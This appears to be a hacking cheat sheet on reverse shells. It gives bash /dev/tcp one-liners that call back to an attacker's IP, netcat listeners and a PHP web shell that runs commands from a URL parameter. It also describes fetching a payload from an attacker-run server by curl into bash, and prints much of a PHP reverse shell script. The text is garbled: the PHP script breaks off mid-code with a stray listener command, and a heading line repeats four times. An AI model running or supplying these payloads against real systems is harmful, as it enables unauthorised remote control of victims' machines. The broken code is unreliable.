A Reverse Shell is a technique used to gain remote access to a victim's system by making the target machine initiate a connection back to the attacker. Unlike a traditional shell, this allows the target to "call back" to the attacker’s machine.
Reverse shells are commonly used in penetration testing and hacking scenarios to maintain access, control compromised systems, and perform further exploitation.
Here are some scripts that can be used to create a reverse shell for various scenarios:
Basic script
Establish a listener port on the host machine with
nc -nlvp $port #An arbitrary port
Use a script to send the remote shell to the listening port
RevShell.sh
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
$port is the port listening with netcat and $ip our IP
If you are using a VPN $ip is the IP given to us by the VPN
Remember also to give execution permissions to the script
It can be also inserted as a command call from a terminal
bash -c "bash -i >& /dev/tcp/$ip/$port 0>&1"
For Linux hosts
nc -nvlp $port
Use a script to send the remote shell to the listening port
echo '<?php system($_GET["cmd"]); ?>' > shell.php #Upload this file in the bucket
http://$url/shell.php?cmd=id #In browser. If there's a response, we have access
Create a bash file with the payload
AwsRevShell.sh
#!/bin/bash
bash -i >& /dev/tcp/$myip/$portcat 0>&1 #Arbitrary port
nc -nvlp $portcat
Create a server with Python
python3 -m http.server $port #Must be created at the same place where the reverse shell script is
Use the curl command from the local server to get the reverse shell file and pass it to the bash of the machine
On an upload option from a PHP-based page, submit the following script
PhpRevShell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '$IP'; // You have changed this
$port = $port; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
nc -nvlp $portcat
Call the file from the browser and check if the shell was caught by the Netcat listener
http://$url/PhpRevShell.php
http://$url/uploads/PhpRevShell.php #Common route for PHP
http://$url/_uploaded/PhpRevShell.php #Another common route
Establish a listener port on the host machine with
Establish a listener port on the host machine with
Establish a listener port on the host machine with
Establish a listener port on the host machine with
